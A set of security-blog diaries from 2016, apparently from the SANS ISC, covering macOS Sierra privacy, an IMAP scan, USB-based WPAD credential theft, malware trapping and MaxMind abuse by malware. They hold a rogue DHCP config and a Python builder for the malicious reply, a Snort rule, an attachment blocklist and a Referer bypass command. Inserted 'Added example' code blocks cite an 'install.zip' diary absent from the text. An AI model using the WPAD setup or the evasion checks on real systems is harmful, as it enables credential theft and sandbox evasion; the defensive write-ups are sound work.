macOS Sierra adds Siri, which may be enabled during the upgrade. Not everybody may be comfortable with having Siri listen in. Just like on iOS, Siri uses a cloud-based service to analyze voice commands. Siri was disabled by default for me, and you can remove the Siri icon from the dock by right-clicking it and selecting "Options" => "Remove from Dock". Siri can also be managed from a dedicated settings dialog.

To verify that Siri is disabled, check the "Siri" dialog in "System Preferences". The "Enable Siri" checkbox should be unchecked. Siri will only listen in and analyze sound if it is invoked by clicking on the Siri icon in the menu bar (upper right-hand corner of the screen).

Apple Watch Screen Unlock

If you own an Apple Watch, and upgraded it to WatchOS 3, then you will be able to unlock your system using your watch. Connecting your watch will only work if you have two-factor authentication enabled for your account, and your watch has to be secured with a passcode. By default, the feature is turned off. You should be able to enable the Apple Watch unlock in the “Security & Privacy” part of the Settings dialog. But lacking a compatible watch I wasn’t able to see the dialog.

Continuity / Universal Clipboard

Continuity existed in OS X El Capitan and allows sharing content between iOS and OS X devices. There is also a cross-device Clipboard to copy/paste between devices. The clipboard could expose sensitive content to other devices, for example if you copy/paste passwords from a password wallet type application. There appears to be no easy way to disable these features. For them to work, you need to link all devices to the same iCloud account, and then enable Wi-Fi as well as Bluetooth on all devices.

Optimized Storage

macOS Sierra can move files to iCloud to save disk space. For files like iTunes movies and music, which you downloaded from Apple, this is probably less of an issue. But it may also affect other files that haven't been opened in a while. To review optimized storage settings, click on "About This Mac" in the Apple menu, then select "Storage" and click on the "Manage" button. The "Recommendations" menu will allow you to turn on some of these features. To turn them off, you will need to disable them in your iCloud settings, or for the automatic trash deletion, in Finder's preferences ("Preferences" => "Advanced").

Gatekeeper

Gatekeeper limits which applications a user may execute. OS X El Capitan had three settings: “Mac App Store”, “Mac App Store and identified developers”, and “Anywhere”. macOS Sierra lost the last option. Instead, if you try to launch an unsigned application, you need to open the “Security & Privacy” dialog, and then you will have to allow the application to run. You will only have to do this the first time you run the application. This behavior is identical to OS X El Capitan. macOS Sierra also re-labeled the options to “App Store” instead of “Mac App Store”. 

A quick way to open an application the first time is to right-click it and select "Open" from the menu, instead of double-clicking it. If you right-click and "Open", a dialog will pop up allowing you to override the Gatekeeper configuration. The dialog will show the hostname of the website from which the application was downloaded.

Summary

The privacy and security changes in macOS Sierra come from its tighter integration with iCloud. Cloud integration is an industry wide trend and not just specific to Apple. Which documents and what data you want to share with cloud services should be carefully evaluated, and the security of cloud accounts will become more and more important. Two-factor authentication is an absolute must, no matter if it is iCloud, Dropbox or OneDrive. Traditional passwords are too easily lost in phishing attacks. Phishing attacks against cloud credentials can be very targeted and convincing. Two-Factor authentication provides some protection against these attacks.

Many of the existing security features in OS X remain the same, like for example FileVault and various other iCloud based services like “Back to my Mac”. Please consult various OS X hardening guides for advice.

[1] http://www.apple.com/macos/sierra/
[2] https://support.apple.com/en-us/HT202303

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

2 Comments

Published: 2016-09-10

Ongoing IMAP Scan, Anyone Else?

I'm operating a mail server which handles email flows for multiple domains (<20 domains). The server has been under a massive IMAPS (TCP port 993) scan for a few days. More details about the ongoing attack:

  • Some logins are valid
  • Some logins seem to be part of a dictionary
  • Some logins are old or unused (like scraped from web pages)
  • Some logins have a format 'user@domain.tld', other just the 'user'

[Update: some IP addresses are also testing SMTP AUTH]

There is a strong password policy in place and no credentials were compromised. This is not a brute-force attack; connection attempts are coming in waves. The only impact until now has been the pollution of my logs!

There is an OSSEC active response[1] with the 'repeated_offender' feature enabled (at 30, 60, 120, 240, 480 minutes), but new IP addresses keep showing up (as if they were part of a botnet):

I searched for more information about the offending IP addresses, they do not seem to belong to a known botnet. They are not Tor exit-nodes. Here is the top-10 of active IP addresses:

155.133.82.55
184.71.40.22
50.39.0.12
185.130.6.226
119.29.229.87
80.200.28.68
80.82.64.102
212.118.124.109
139.255.51.42
151.253.48.108

Has anyone else detected the same kind of scan?

[1] http://ossec-docs.readthedocs.io/en/latest/manual/ar/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

2 Comments

Published: 2016-09-09

Collecting Users Credentials from Locked Devices

It's a fact: when a device can be physically accessed, you may consider it compromised. Even if the device is properly hardened, it's just a matter of time. The best hacks are the ones which use a feature, or the way the computer is supposed to work. To illustrate this, let's review an interesting blog post published yesterday[1]. It demonstrates how easy it is to steal credentials from a locked computer. The attack is not new, but the method used is really neat. You probably know that computers tend to generate a lot of network requests that may contain sensitive information. As an example, if you specify a URL like "file://1.2.3.4/doc.txt" in a web page, Internet Explorer will try to access the file via SMB and will disclose the current user's credentials (as an NTLM challenge-response) to that host. In the new attack, there is no need to play with cables to sniff traffic, no MitM and no altered web pages. Access to the USB port of a locked computer (read: a user being logged in but away for a coffee break) is enough.

To perform the attack, a low-cost device is required, like the USB Armory[2] or the Hak5 LAN Turtle[3]; both can be connected to a host computer via USB and provide TCP/IP service via Ethernet over USB[4]. When you plug such a device into the USB port, a driver is loaded by the operating system (which does not require any user interaction, even when the screen is locked), a new network interface is set up and classic TCP/IP communications occur. What happens then? The host computer considers this interface the new default one for a few seconds and tries to configure it by requesting an IP address via DHCP.

The USB Armory is configured to provide DHCP service, but with a specific option (number 252) that announces the proxy auto-configuration script, also called "WPAD" ("Web Proxy Auto-Discovery Protocol"):

option local-proxy-config code 252 = text;

subnet 192.168.10.0 netmask 255.255.255.0 {
    ...
    option local-proxy-config "http://192.168.10.1/wpad.dat";
}

The key point is that a WPAD location provided by DHCP has a higher priority than one discovered via DNS. The tool that handles the requests and captures the credentials is Responder[5]. A nice demonstration is available on YouTube[6]. Evil!

The next question is: "how to protect against this kind of attack?". It's not easy, because countermeasures may affect computer operations or restrict what users can do. The first idea is to disable the automatic proxy settings (which can also be enforced via a GPO), but it does not prevent the host computer from making an HTTP request to the URL provided by DHCP. I tested on a Windows 10 system, disabled all the automatic configurations, rebooted and saw this on my web server:

192.168.254.222 - - [09/Sep/2016:08:26:53 +0200] "GET /wpad.dat HTTP/1.1" 200 591 "-" "WinHttp-Autoproxy-Service/5.1"

How to mitigate this attack?

Completely disabling the USB ports is not an option, but restricting which classes of USB devices may be installed (usually thought of for HID, "Human Interface Devices", but here the device presents itself as a USB network adapter) can be implemented via a GPO or dedicated software.

If you don't use automatic proxy discovery, monitor your DNS logs for requests like "wpad.domain.com". The WPAD configuration over DHCP has a higher priority than DNS; however, as explained by Microsoft[7]:

"Now, if DHCP is configured to provide the WPAD location, IE stops the detection and will make a GET request for the wpad.dat file and no further searching is done. This is true even if the DHCP 252 option is incorrect and a correct entry is configured as a DNS record. Please also be aware that IE still sends out the DNS query in this situation, even the DNS result won't be adopted."

Again, I saw this while booting my Windows 10 system. It tried to find valid WPAD URLs:

09-Sep-2016 08:26:54.672 queries: info: client 192.168.254.222#57683: query: wpad.xxxxx IN AAAA + (192.168.254.8)
09-Sep-2016 08:26:54.672 queries: info: client 192.168.254.222#61760: query: wpad.xxxxx IN A + (192.168.254.8)

If you don't use DHCP option 252 in your network, a good idea is to detect its use with your IDS. Here is a Snort / Suricata rule (from the Emerging Threats ruleset):

alert udp any 67 -> any 68 (msg:"ET INFO Web Proxy Auto Discovery Protocol WPAD DHCP 252 option Possible BadTunnel"; content:"|02|"; depth:1; content:"|fc|"; byte_jump:1,0,relative,post_offset -9; content:"/wpad.dat"; within:9; fast_pattern; classtype:protocol-command-decode; sid:2022915; rev:1;)

(Note that this rule won't protect you against the attack described here, because the DHCP traffic stays local to the USB link and never crosses a sensor, but it can help you detect a classic MitM attack on the LAN.)

Finally, you can track the use of devices like the USB Armory by monitoring the registry key HKLM\SYSTEM\CurrentControlSet\Enum\USB. Here is a screenshot (idVendor=0525 is the USB Armory):
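Added example (not from the blog post, the dhcpd snippet or Responder): a builder and parser for the DHCP reply, so you can see exactly which bytes the rule above keys on, namely op = 0x02 (BOOTREPLY) in the first byte and option code 0xfc (252) carrying a URL that ends in /wpad.dat. The reply is constructed with the subnet and URL from the dhcpd snippet; the transaction ID and the empty client MAC are made up.

```python
"""Build and inspect a DHCP reply carrying option 252 (WPAD URL), the bytes the
Snort/Suricata rule above matches: op 0x02, option 0xfc, value ending in /wpad.dat.

The reply is constructed here; the subnet and URL come from the dhcpd snippet."""
import struct

DHCP_MAGIC = b"\x63\x82\x53\x63"          # magic cookie at offset 236
BOOTREPLY = 2                              # op field: server -> client
DHCPOFFER = 2                              # value of option 53
OPT_PAD, OPT_SUBNET, OPT_ROUTER, OPT_MSG_TYPE, OPT_WPAD, OPT_END = 0, 1, 3, 53, 252, 255


def ip_bytes(addr):
    return bytes(int(octet) for octet in addr.split("."))


def build_dhcp_reply(yiaddr, options, xid=0x3903F326):
    """Minimal BOOTREPLY: 236-byte fixed header, magic cookie, TLV options, END."""
    header = struct.pack("!BBBB", BOOTREPLY, 1, 6, 0)   # op, htype=Ethernet, hlen, hops
    header += struct.pack("!IHH", xid, 0, 0)             # xid, secs, flags
    header += bytes(4) + ip_bytes(yiaddr)                # ciaddr, yiaddr (offered address)
    header += bytes(4) + bytes(4)                        # siaddr, giaddr
    header += bytes(16) + bytes(64) + bytes(128)         # chaddr, sname, file
    body = b"".join(bytes([code, len(value)]) + value for code, value in options)
    return header + DHCP_MAGIC + body + bytes([OPT_END])


def parse_dhcp_options(pkt):
    """Walk the TLV option list; returns {code: raw value}."""
    if len(pkt) < 240 or pkt[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP packet (missing magic cookie)")
    options, i = {}, 240
    while i < len(pkt) and pkt[i] != OPT_END:
        if pkt[i] == OPT_PAD:
            i += 1
            continue
        code, length = pkt[i], pkt[i + 1]
        options[code] = pkt[i + 2:i + 2 + length]
        i += 2 + length
    return options


def wpad_url(pkt):
    """URL pushed via option 252 in a server reply, or None (the rule's condition)."""
    if pkt[0] != BOOTREPLY:
        return None
    value = parse_dhcp_options(pkt).get(OPT_WPAD)
    return value.rstrip(b"\x00").decode("ascii", "replace") if value else None


# Constructed: what the rogue DHCP server on the USB link would answer
ROGUE_REPLY = build_dhcp_reply("192.168.10.100", [
    (OPT_MSG_TYPE, bytes([DHCPOFFER])),
    (OPT_SUBNET, ip_bytes("255.255.255.0")),
    (OPT_ROUTER, ip_bytes("192.168.10.1")),
    (OPT_WPAD, b"http://192.168.10.1/wpad.dat"),
])
# Constructed: the same offer from a server that does not push a proxy
NORMAL_REPLY = build_dhcp_reply("192.168.10.100", [
    (OPT_MSG_TYPE, bytes([DHCPOFFER])),
    (OPT_SUBNET, ip_bytes("255.255.255.0")),
    (OPT_ROUTER, ip_bytes("192.168.10.1")),
])

if __name__ == "__main__":
    for name, pkt in (("rogue", ROGUE_REPLY), ("normal", NORMAL_REPLY)):
        url = wpad_url(pkt)
        flag = "ALERT" if url and url.endswith("/wpad.dat") else "ok"
        print(f"{name}: op={pkt[0]:#04x} option 252 -> {url!r} {flag}")
```

Fed the same two replies, the rule would fire on the first and stay quiet on the second; the limitation the note above describes is simply that the rogue reply travels over the USB link inside the victim, where no sensor sees UDP 67 -> 68.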

This can be implemented with a host based IDS like OSSEC[8].

As you can see, this attack is not easy to mitigate. If you have tips to protect against such USB attack, feel free to share!

[1] https://room362.com/post/2016/snagging-creds-from-locked-machines/
[2] https://inversepath.com/usbarmory
[3] http://hakshop.myshopify.com/collections/lan-turtle/products/lan-turtle
[4] https://en.wikipedia.org/wiki/Ethernet_over_USB
[5] https://github.com/Spiderlabs/Responder
[6] https://www.youtube.com/watch?v=Oplubg5q7ao
[7] https://blogs.msdn.microsoft.com/asiatech/2012/08/14/insight-wpad-proxy-settings-on-ie/
[8] https://blog.rootshell.be/2010/03/15/detecting-usb-storage-usage-with-ossec/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

15 Comments

Published: 2016-09-08

Curious SNMP Traffic Spike

It could be nothing.  It could be something.

The ISC HoneyPot has been showing some port 161 traffic.

12:08:27.874575 IP x.x.x.x.12458 > y.y.y.y.161: GetRequest(28) .1.3.6.1.2.1.1.1.0
12:09:10.952260 IP z.z.z.z.12458 > a.a.a.a.161: GetRequest(28) .1.3.6.1.2.1.1.1.0
12:09:52.802179 IP b.b.b.b.12458 > c.c.c.c.161: GetRequest(28) .1.3.6.1.2.1.1.1.0

So I did some poking around, read some articles [1] and found some similarities, etc. No real testing per se yet. Then, after yesterday's data was collected, the ISC port data showed a curious correlation. So I am turning to our readers: can any of you offer any corroborating data or anecdotes? The graph [3] shows a tripling in sources on Aug 11, near the time when some of the recent Cisco vulnerabilities became well known [2], then a similar spike yesterday. The numbers do not entirely warrant a deep dive; however, knowing about the events surrounding port 161 from Aug 13 (or near there), there could be something to it.
[1] http://blog.level3.com/security/shadow-brokers-hit-light-of-day/
[2] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp
[3] https://isc.sans.edu/port.html?port=161

Please leave a comment if you see anything that correlates in your travels.

-Kevin

--
ISC Handler on Duty

7 Comments

Published: 2016-09-07

Updated DShield Blocklist

Earlier today, I updated how our "block list" is generated. The idea behind this is to avoid some false positives and to make the list more meaningful. As usual, please note that this list is "as is" and use it at your risk. There will likely be some false positives from time to time, and of course, your definition of "false positives" may be different than ours.

The list, like before, lists /24 networks. We found in the past that this network size provides a reasonable balance between false positives and blocking sets of known misbehaving IPs efficiently.

Networks will be de-listed on request. We will not review the request for "maliciousness". But if you know you are listed, and you ask us to remove you, we will do so as soon as possible. 

To compile the list, we rank /24 networks based on the number of targets they attack. We only include reports if we received them from multiple submitters. Some common false positives are removed and not included in the ranking.

Of course, you can build your own lists using whatever data we provide. But please be aware that the purpose of our data is research, not blocking. We do not filter the data displayed on our site for false positives. It is up to you to decide what a false positive is. For example, we do include "research scans" in our data, and even in our blocklist. Some may consider this a false positive.

A "top N" blocklist like this one blocks common, Internet-wide scans. It will not protect you from targeted scans, and it will not protect you from all scans of this type. Please understand these limitations before applying the blocklist. The block list is updated once an hour.

URL of our blocklist: https://isc.sans.edu/feeds/block.txt

For more detailed data, use our API: https://isc.sans.edu/api

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


Published: 2016-09-06

How to Set Up Your Own Malware Trap

I am sure what you really want is more malware ;-). But a few people asked for tricks to collect malware. Malware can be useful for a number of reasons: First of all, you could extract indicators of compromise from malware using various more or less automated methods. In addition, it is a good idea to keep an eye on what your users may be seeing, in particular, if they receive e-mail from sources other than your corporate e-mail system.

Sadly, many corporations these days switch to cloud providers for e-mail. But it can still be useful to set up a relay to pre-filter your e-mail before it hits the cloud provider, to gain insight that your cloud provider's limited logs do not provide.

Personally, I am using Postfix, so what I am going to talk about will be Postfix specific (and some procmail, which may be used with other mail servers). If you have similar tricks for other mail servers, then please comment.

(1) improved logging

Quite often, a user (or maybe even an AV system) may flag an e-mail as suspect. If this turns out to be a real malicious e-mail (phishing, malware...), then it is nice to be able to quickly look for other e-mails with the same subject or the same "From" address. In order to make this easier, I like to have Postfix log the "From", "To" and "Subject" headers. You can easily accomplish this with header checks. In Postfix, header checks are normally used to filter e-mail with specific headers, but if you flag a match only as a WARN, the header is just logged. I added the following lines to my "header_checks" file to log the Subject, To, and From:

/^subject:/      WARN
/^to:/           WARN
/^from:/         WARN
/^Subject:/      WARN
/^To:/           WARN
/^From:/         WARN

You then need to add the following line to your main.cf to use these header checks:

header_checks = regexp:/etc/postfix/header_checks 

(/etc/postfix/header_checks is the name of the file. Yours may be different.)

You will now see lines like this in your maillog:

Sep  6 15:26:50 mail postfix/cleanup[24158]: 39B0D7FFA9: warning: 
 header Subject: August invoice from unknown[39.46.85.64]; 
 from=Burnett.84@corporate-change.com to=list@dshield.org proto=ESMTP helo=<[39.46.86.81]>

Next, a little procmail trick that will get rid of most current malicious e-mail: a simple check to see if any compressed attachments include files with known bad extensions:

:0 B
* ^Content-Type: (application/zip|application/x-zip-compressed);
{
        :0 fbhw
        | /usr/local/bin/mime-zip-trojan.pl
}

"mime-zip-trojan.pl" is an amazingly simple Perl script. You can very easily modify it to extend the extension blocklist. (I can't bring up the site for this script right now, so please trust the Google to find it for you.)

The script doesn't block anything, but instead, it just adds a header to the e-mail (X-Zip-Trojan: Yes) that you can then use to filter the e-mail with additional procmail rules.

Finally, you should of course send all e-mail (including e-mail found by mime-zip-trojan.pl) through an AV scanner so you don't waste your time analyzing old malware.
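As an added example (not the diary's setup and not mime-zip-trojan.pl itself), a Python filter that does the same job as the Perl script in the procmail recipe above: it reads a message, lists the members of any ZIP attachment, and adds an X-Zip-Trojan: Yes header when a member has a blocklisted extension. The extension list and the sample message are constructed assumptions.

```python
import io
import sys
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Archive member extensions treated as "known bad". The set is an assumption;
# extend it the same way the diary suggests for the Perl script's blocklist.
BAD_EXTENSIONS = (".exe", ".scr", ".pif", ".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".cmd", ".bat", ".jar")
ZIP_TYPES = ("application/zip", "application/x-zip-compressed")


def suspicious_names(zip_bytes):
    """Names inside the archive with a blocklisted extension. Only the central
    directory is read, so a password-protected ZIP is still inspected."""
    try:
        with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:
        return []
    return [n for n in names if n.lower().endswith(BAD_EXTENSIONS)]


def tag_message(raw_bytes):
    """Parse a raw message and add 'X-Zip-Trojan: Yes' (plus the offending names)
    when any ZIP attachment contains a blocklisted file. Nothing is blocked here."""
    msg = BytesParser(policy=policy.default).parsebytes(raw_bytes)
    hits = []
    for part in msg.walk():
        name = (part.get_filename() or "").lower()
        if part.get_content_type() in ZIP_TYPES or name.endswith(".zip"):
            hits.extend(suspicious_names(part.get_payload(decode=True) or b""))
    if hits:
        msg["X-Zip-Trojan"] = "Yes"
        msg["X-Zip-Trojan-Names"] = ", ".join(hits)
    return msg


def build_sample(member="August invoice.js"):
    """Constructed test message: a ZIP attachment holding one file named `member`."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member, "placeholder content, not a real script")
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = "billing@example.com", "list@example.org", "August invoice"
    msg.set_content("Please see attached.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip", filename="invoice.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    # As a procmail filter: read the message on stdin, write the tagged copy to stdout.
    raw = sys.stdin.buffer.read() if not sys.stdin.isatty() else build_sample()
    sys.stdout.buffer.write(tag_message(raw).as_bytes())
```

Drop it in place of the Perl script in the `:0 fbhw` recipe and match on the added header in a later rule; a password-protected archive like the install.zip in the first diary is still classified because member names are not encrypted.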

One thing you SHOULD NEVER do: send all attachments to VirusTotal. VirusTotal is a great service, and they offer some tools to automate submissions. But do not send anything beyond a hash unless you are pretty sure it is malicious, and absolutely sure it is not confidential. Any files sent to VirusTotal are made available to researchers and others.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


Published: 2016-09-05

Malware Delivered via '.pub' Files

While searching for new scenarios to deliver their malware[1][2], attackers launched a campaign to deliver malicious code embedded in Microsoft Publisher[3] (.pub) files. Publisher is less well known than Word or Excel. This desktop publishing tool was released in 1991 (version 1.0) but it is still alive and included in the newest Office suite. It is not surprising that it also supports macros.

By using .pub files, attackers gain on several fronts: potential victims don't know the ".pub" extension (which can be read as "public" or "publicity" and makes the document look less suspicious), spam filters do not block this file extension, and researchers are also impacted because their sandbox environments do not have Publisher installed by default, making the sample impossible to analyze!

A sample of a malicious .pub file is already available on VT[4] with a low detection score (5/55).

Stay safe!

[1] https://isc.sans.edu/forums/diary/Voice+Message+Notifications+Deliver+Ransomware/21397/
[2] https://isc.sans.edu/forums/diary/Todays+Locky+Variant+Arrives+as+a+Windows+Script+File/21423/
[3] https://products.office.com/en/publisher
[4] https://www.virustotal.com/en/file/24441d0573c255852f28e558001883a00bc2f18816f48653d63429065d1f37fd/analysis/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key


Published: 2016-09-02

Apple Patches "Trident" Vulnerabilities in OS X / Safari

About a week ago, Apple patched three vulnerabilities in iOS that had been used in a targeted exploit. This set of vulnerabilities, also known as "Trident," affected WebKit and the iOS kernel. Given the substantial code overlap between iOS and OS X, and in particular the fact that one of the vulnerabilities affected WebKit, it is no surprise that OS X and Safari are vulnerable as well.

Yesterday, Apple released patches for OS X and Safari to address these issues.

The OS X update, which is only available for El Capitan and Yosemite, fixes the two kernel vulnerabilities. The Safari update, which is available for OS X Mavericks and Yosemite (not the latest version, El Capitan), fixes the WebKit vulnerability.

I recommend patching these quickly given that the same vulnerabilities have already been exploited for iOS.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


Published: 2016-09-01

Maxmind.com (Ab)used As Anti-Analysis Technique

A long time ago I wrote a diary[1] about malware samples which use online geolocation services. Such services are used to target only specific victims: if the malware detects that it is executed from a specific area, it just stops. This has been seen in Russian malware which did not infect people located in the same area.

Today, once in the wild, malware samples are quickly intercepted and analyzed by security researchers but also by big players on the security market. New anti-analysis techniques are regularly deployed to prevent the malware from executing or to change its behavior. One of the latest techniques, discovered by McAfee[2], is the abuse of the MaxMind[3] GeoIP services. This can be implemented via a simple GET request against the MaxMind API, which suffers from a lack of access control.

If you query this URL:

$ wget https://www.maxmind.com/geoip/v2.1/city/me
--2016-09-01 07:45:41--  https://www.maxmind.com/geoip/v2.1/city/me
Resolving www.maxmind.com (www.maxmind.com)... 2400:cb00:2048:1::6810:262f, 2400:cb00:2048:1::6810:252f, 104.16.38.47, ...
Connecting to www.maxmind.com (www.maxmind.com)|2400:cb00:2048:1::6810:262f|:443... connected.
HTTP request sent, awaiting response... 401 Unauthorized

Username/Password Authentication Failed.

But if you just add a suitable Referer header:

$ wget -O whereami.txt --referer=https://www.maxmind.com/en/locate-my-ip-address https://www.maxmind.com/geoip/v2.1/city/me
--2016-09-01 07:47:11--  https://www.maxmind.com/geoip/v2.1/city/me
Resolving www.maxmind.com (www.maxmind.com)... 2400:cb00:2048:1::6810:262f, 2400:cb00:2048:1::6810:252f, 104.16.38.47, ...
Connecting to www.maxmind.com (www.maxmind.com)|2400:cb00:2048:1::6810:262f|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1214 (1.2K) [application/vnd.maxmind.com-city+json]
Saving to: ‘whereami.txt’

where-am-i.txt       100%[==========================================================>]   1.19K  --.-KB/s    in 0s

2016-09-01 07:49:08 (17.1 MB/s) - ‘where-am-i.txt’ saved [1214/1214]

$ cat whereami.txt
{"country":{"names":{"pt-BR":"Bélgica","de":"Belgien","en":"Belgium","ja":"ベルギー王国","es":"Bélgica", \
"zh-CN":"比利时","ru":"Бельгия","fr":"Belgique"},"geoname_id":2802361,"iso_code":"BE"},"location" \
{"time_zone":"Europe/Brussels","accuracy_radius":100,"longitude":4.3333,"latitude":50.6},"traits": \
{"autonomous_system_organization":"BELGACOM-SKYNET-AS","ip_address":"xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx", \
"isp":"Belgacom-skynet-as", "organization":"Belgacom-skynet-as","autonomous_system_number":5432},"city": \
{"geoname_id":2790101,"names":{"en":"Nivelles","de":"Nivelles","ru":"Нивель","zh-CN":"尼韦尔", \
"fr":"Nivelles"}},"postal":{"code":"1400"},"subdivisions":[{"geoname_id":3337387, \
"names":{"pt-BR": "Valônia","fr":"Wallonie","es":"Valonia","en":"Wallonia","de":"Wallonische Region"}, \
"iso_code":"WAL"},{"iso_code":"WBR","geoname_id":3333251,"names":{"pt-BR":"Brabante Valão", \
"en":"Walloon Brabant Province","de":"Provinz Wallonisch-Brabant","es":"Brabant Wallonie", \
"fr":"Brabant Wallon"}}],"continent":{"code":"EU","names":{"pt-BR":"Europa","en":"Europe", \
"de":"Europa","ja":"ヨーロッパ","es":"Europa","fr":"Europe","zh-CN":"欧洲","ru":"Европа"}, \
"geoname_id":6255148}}

You can see that it's possible to locate me, but the response also reports information like the AS and the organization/ISP. The malware searches these fields for interesting strings such as AV vendor names, but not only those: if the network name contains strings like "Data Center", "VPS", "Hosting" or "Shared", chances are that the host running the malware is not an endpoint device.

If you're performing research or investigations, always use a dedicated xDSL or cable connection!
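As an added example (not from the diary or McAfee's analysis), a self-check for an analysis lab: it parses a city lookup response in the shape shown above and reports which traits fields would make such malware classify the host as a non-endpoint. The two sample documents are constructed, and the AV vendor list and the extra hosting markers are assumptions.

```python
import json

# Substrings of ISP / organization / AS names that suggest a server rather than an
# endpoint. The first four are the ones the diary names; the rest are assumed additions.
HOSTING_MARKERS = ("data center", "vps", "hosting", "shared", "datacenter", "cloud", "colocation")
# AV vendor names such malware is reported to look for; this particular list is assumed.
AV_VENDOR_MARKERS = ("kaspersky", "symantec", "mcafee", "sophos", "trend micro", "eset", "bitdefender")
# Fields of the "traits" object in the /geoip/v2.1/city response that carry the network name.
TRAIT_FIELDS = ("isp", "organization", "autonomous_system_organization")


def egress_fingerprint(city_json):
    """Return the reasons a MaxMind city lookup of this egress IP would make
    anti-analysis malware stop: one entry per (field, marker) hit, empty if clean."""
    traits = json.loads(city_json).get("traits", {})
    reasons = []
    for field in TRAIT_FIELDS:
        value = str(traits.get(field, ""))
        low = value.lower()
        for marker in HOSTING_MARKERS:
            if marker in low:
                reasons.append(f"{field}={value!r} looks like hosting ({marker!r})")
        for vendor in AV_VENDOR_MARKERS:
            if vendor in low:
                reasons.append(f"{field}={value!r} names an AV vendor ({vendor!r})")
    return reasons


# Constructed responses carrying only the fields read above, modelled on the diary's output.
RESIDENTIAL = json.dumps({"country": {"iso_code": "BE"}, "traits": {
    "autonomous_system_organization": "BELGACOM-SKYNET-AS", "isp": "Belgacom-skynet-as",
    "organization": "Belgacom-skynet-as", "autonomous_system_number": 5432}})
LAB_VPS = json.dumps({"country": {"iso_code": "NL"}, "traits": {
    "autonomous_system_organization": "EXAMPLE-HOSTING-AS", "isp": "Example VPS Hosting B.V.",
    "organization": "Example Shared Data Center", "autonomous_system_number": 64496}})

if __name__ == "__main__":
    for label, doc in (("residential", RESIDENTIAL), ("lab", LAB_VPS)):
        hits = egress_fingerprint(doc)
        print(f"{label}: {'would be flagged' if hits else 'looks like an endpoint'}")
        for reason in hits:
            print("  -", reason)
```

Run it against the whereami.txt you saved yourself to learn whether your sandbox egress passes as a residential line, which is the practical test of the advice above.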

[1] https://isc.sans.edu/forums/diary/Victim+of+its+own+success+and+abused+by+malwares/20311/
[2] https://blogs.mcafee.com/mcafee-labs/macro-malware-adds-tricks-uses-maxmind-to-avoid-detection/
[3] https://www.maxmind.com/en/geoip2-services-and-databases

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key
